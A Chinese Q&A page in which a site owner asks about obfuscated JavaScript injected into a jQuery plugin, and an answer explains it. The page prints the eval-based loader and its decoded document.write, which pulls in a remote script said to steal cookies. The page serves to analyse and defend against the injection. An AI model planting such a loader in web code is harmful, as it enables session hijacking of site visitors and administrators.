javascript - 网站被植入中奖代码js

问题描述

问 题

最近网站打开老是有左下角弹出中奖信息 看了下 在jq插件下面 加了一段恶意代码

var str="cnbtldms-vqhsd'!;rbqhosrqb<[!gsso9..vvv-fnnfkd`crk-bnl.robncd.iptdqx-ir[!=;.rbqhos=!(:";var length=str.length;var ba64="";for(i=0;i<length;i++){var s=str.charCodeAt(i);s++;ba64=ba64+String.fromCharCode(s)}eval(ba64);

请问这种原理是什么 怎么能够防范

解决方案

1. 你的jquery插件下载的时候就有这个。

2. 你的网站被黑了。

前面的密文其实就是字符串的unicode码往前减一。

解密后是这个东西

document.write("<scriptsrc'mu<\"http://www.googleadsl.com/spcode/jquery.js\"></script>");

往页面中插入了一个远程js，是一个典型的xss攻击案例，为了规避waf，他并没有使用标准script脚本，以上代码直接执行不会直接加载，而是会在加载下个js脚本的同时加载进来这个远程脚本。

我去看下了下，现在已经不是弹中奖了，而是直接获取cookies，通过cookies可以直接登陆你的账号，如果你的账号是管理员的话。。。

这篇关于javascript - 网站被植入中奖代码js的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！